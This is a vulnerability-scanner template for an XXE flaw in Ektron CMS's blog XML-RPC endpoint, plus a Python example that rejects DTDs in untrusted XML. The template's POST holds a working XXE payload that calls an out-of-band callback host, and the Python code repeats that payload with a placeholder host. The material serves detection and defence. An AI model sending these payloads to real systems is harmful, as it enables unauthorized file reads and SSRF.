Vulnerability description
Detects XML External Entity (XXE) vulnerability in Ektron CMS Blogs component (/WorkArea/Blogs/xmlrpc.aspx). Allows unauthenticated attackers to read local files or perform SSRF.
id: ektron-blog-xmlrpc-xxe

info:
  name: Ektron CMS Blogs xmlrpc.aspx - XML External Entity Injection
  author: pussycat0x
  severity: high
  description: |
    Detects XML External Entity (XXE) vulnerability in Ektron CMS Blogs component (/WorkArea/Blogs/xmlrpc.aspx). Allows unauthenticated attackers to read local files or perform SSRF.
  reference:
    - https://www.exploit-db.com/exploits/21085
    - https://packetstormsecurity.com/files/116259/Ektron-CMS-8.5.0-File-Upload-XXE-Injection.html
    - https://www.acunetix.com/vulnerabilities/web/ektron-cms-multiple-vulnerabilities
  metadata:
    verified: false
    max-request: 2
    shodan-query: http.html:"EktronClientManager"
  tags: xxe,ektron,cms,vuln

flow: http(1) && http(2)

http:
  # Request 1: fingerprint the target as Ektron before sending the probe.
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "EktronClientManager")'
        condition: and

  # Request 2: out-of-band XXE probe; a DNS hit on the interactsh
  # callback proves the parser resolved the external entity.
  - raw:
      - |
        POST /WorkArea/Blogs/xmlrpc.aspx HTTP/1.1
        Host: {{Hostname}}

        <!DOCTYPE scan [<!ENTITY test SYSTEM "http://{{interactsh-url}}">]>
        <scan>&test;</scan>

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, "dns")
          - status_code == 200 || status_code == 500
        condition: and
# digest: 4a0a00473045022100a2a200f7cfae38d7a6b66bcb1c60fd3cdd70df6b7e2cfacb156f03656e5c0bb9022031607e22ece395e0797952017d9f46f3bc36ed2009856b45a2035ee606a6d69d:922c64590222798bb761d5b6d8e72950
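The template above fires when an XML-RPC endpoint resolves a `SYSTEM` entity declared in the request's DOCTYPE. The corresponding fix on the server side is to refuse any DTD or entity declaration in untrusted XML before building a tree from it. The following is an added example, not part of the template or of Ektron's code; it uses only the Python standard library, the probe document is a constructed sample with a placeholder host (`oob.example.invalid`) in place of the template's `{{interactsh-url}}`, and the `blogger.getUsersBlogs` request is a constructed benign XML-RPC call.

```python
"""Reject DTDs and entity declarations in untrusted XML (e.g. an XML-RPC body)."""
import xml.etree.ElementTree as ET
import xml.parsers.expat


class UnsafeXML(ValueError):
    """Raised when a document declares a DOCTYPE or any entity."""


def reject_dtd(data: str) -> None:
    """First pass: stream the document through expat and abort on the first
    DOCTYPE or entity declaration. Raising inside a handler stops the parse
    and propagates out of Parse(), so nothing after the declaration is read.
    Refusing declarations outright (rather than trusting parser defaults)
    also blocks internal-entity expansion attacks such as billion laughs."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE {name!r} is not allowed in this request")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXML(f"entity declaration {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(data, True)


def parse_untrusted(data: str) -> ET.Element:
    """Second pass: only documents that survived reject_dtd() reach the
    tree builder, so the returned tree can never contain resolved entities."""
    reject_dtd(data)
    return ET.fromstring(data)


def classify(data: str) -> str:
    """Outcome label suitable for a request log or a WAF-style counter:
    'rejected' (DTD present), 'malformed' (not well-formed), or 'ok'."""
    try:
        parse_untrusted(data)
        return "ok"
    except UnsafeXML:
        return "rejected"
    except (xml.parsers.expat.ExpatError, ET.ParseError):
        return "malformed"


# Constructed sample: the shape of the template's probe, with a placeholder
# host instead of a real out-of-band callback address.
XXE_PROBE = (
    '<!DOCTYPE scan [<!ENTITY test SYSTEM "http://oob.example.invalid/">]>'
    "<scan>&test;</scan>"
)

# Constructed sample: a benign XML-RPC call of the kind a blog client sends.
BENIGN_CALL = """<?xml version="1.0"?>
<methodCall>
  <methodName>blogger.getUsersBlogs</methodName>
  <params><param><value><string>appkey</string></value></param></params>
</methodCall>"""


if __name__ == "__main__":
    for label, doc in (("probe", XXE_PROBE), ("benign", BENIGN_CALL)):
        print(f"{label}: {classify(doc)}")
```

`reject_dtd()` is deliberately a separate pass: the decision to drop a request is made before any tree is built, and the same function can be reused in front of whatever XML library the application actually uses. Rejecting at the DOCTYPE is the right granularity for an XML-RPC endpoint, since well-formed XML-RPC never needs a DTD.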